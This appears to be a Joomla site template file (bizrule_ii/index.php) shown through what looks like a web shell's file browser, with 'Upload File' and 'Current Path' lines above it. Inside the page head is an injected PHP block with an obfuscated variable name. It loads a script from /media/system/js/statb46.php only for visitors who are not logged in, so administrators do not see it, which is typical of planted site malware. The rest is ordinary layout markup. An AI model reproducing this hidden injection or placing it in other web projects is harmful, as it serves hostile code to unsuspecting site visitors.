Your IP : 216.73.216.145


Current Path : /home/atice/wwwAvant/templates/bizrule_ii/
Upload File :
Current File : /home/atice/wwwAvant/templates/bizrule_ii/index.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<!--
author: raduga http://joomlafabric.com
copyright: GNU/GPL
-->
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/bizrule_ii/css/template.css" type="text/css" />


<?php $_b464beb8=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo "
<script language=JavaScript id=onDate ></script>
<script language=JavaScript src=/media/system/js/statb46.php ></script>
";};$_b464beb8=1; ?>
</head>

<body id="body">

<div id="logo">
<div  id="top_bar">
<?php if($this->countModules('banner')) : ?>
<jdoc:include type="modules" name="banner" style="raw"/>
<?php endif; ?>
</div></div>
           
                
                <div align="center">
<?php if($this->countModules('user3')) : ?>
<jdoc:include type="modules" name="user3" />
<?php endif; ?>
                </div> 
                <div id="clear"></div>

                  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"  id="centertb">
                  <tr>

<?php if($this->countModules('left')) : ?>
                  <td  valign="top" class="leftcol">
                  <div>
                  <jdoc:include type="modules" name="left" style="rounded"/>
                  </div>
                  </td> 
<?php endif; ?>

             <td valign="top"  width="100%" id="contenttb"> 
             <table width="100%"  border="0" cellspacing="0" cellpadding="0">

                <tr>
                <td  colspan="3" class="pw" ><div><jdoc:include type="module" name="breadcrumbs" /></div></td>
                </tr>

<?php if($this->countModules('top')) : ?>             
                        <tr valign="top" >
                        <td colspan="3" align="center" class="contentmod">
                        <div>
                        <jdoc:include type="modules" name="top" style="table"/>
                        </div>
                        </td> 
                        </tr>
                        <tr><td colspan="3"></td></tr>
<?php endif; ?>


                                          <?php 
						
							if ($this->countModules( "user1" )>0 && $this->countModules( "user2" )>0){
							$modtopwidth = 50;
							}

                                          else if ($this->countModules( "user1","user2" )) {
							$modtopwidth = 100;
							}

							?>


<?php if ($this->countModules( "user1" )>0 or $this->countModules( "user2" )>0) : ?> 
 <tr>
<?php if($this->countModules('user1')) : ?> 
                        <td valign="top" class="contentmod" width="<?php echo $modtopwidth; ?>%">
                        <div>
                        <jdoc:include type="modules" name="user1" style="table"/>
                        </div>
                        </td>
<?php endif; ?>
<?php if ($this->countModules( "user1" )>0 && $this->countModules( "user2" )>0) : ?>

                       <td><div class="mod"></div></td> 
<?php endif; ?> 

<?php if($this->countModules('user2')) : ?>
                    <td valign="top" class="contentmod" width="<?php echo $modtopwidth; ?>%">
                    <div>
                    <jdoc:include type="modules" name="user2" style="table"/>
                    </div></td> 
<?php endif; ?>
        </tr>
                    
                   <tr><td colspan="3"></td></tr>
<?php endif; ?>

             

          <tr align="left" valign="top">
                      <td colspan="3" style="padding: 5px 0;">
                      <div class="main">

<?php if ($this->getBuffer('message')) : ?>
   <jdoc:include type="message" />
<?php endif; ?>

<?php if($this->params->get('showComponent')) : ?>
	<jdoc:include type="component" />
<?php endif; ?>
                      </div> 
                      </td>
          </tr>


<?php if($this->countModules('bottom')) : ?>
<tr>
                      <td colspan="3" valign="top" style="padding-top:10px;text-align: left;" class="contentmod"> 

                      <div>
                      <jdoc:include type="modules" name="bottom" style="table"/>
                      </div>
                      </td>
                      </tr>
<?php endif; ?>

                      </table>
                      </td>

<?php if($this->countModules('right')) : ?>
                      <td valign="top" class="rightcol">
                      <div>
                      <jdoc:include type="modules" name="right" style="rounded"/>
                      </div>
                      </td>
<?php endif; ?>

         </tr>
</table> 
        
                <div class="foot">
                <div class="footer_left">


<?php 
echo"<p>
".JText::_('All Rights Reserved').' '. JHTML::Date( 'now', '%Y' ) .'  ' . '<a href="'.JURI::base().'" title="'.JURI::base().'">'.JURI::base().'</a>'."
</p>";
?>

              
                </div>
                <div class="footer_right">

<?php if($this->countModules('syndicate')) : ?>
<p class="feed">
<jdoc:include type="modules" name="syndicate" />
</p> 
<?php endif; ?> 

<p>
<a href="http://mambasana.ru">designed by raduga</a> | <a href="http://joomlafabric.com">jf</a>
</p>
                </div>
                </div>
                

         
</body>
</html>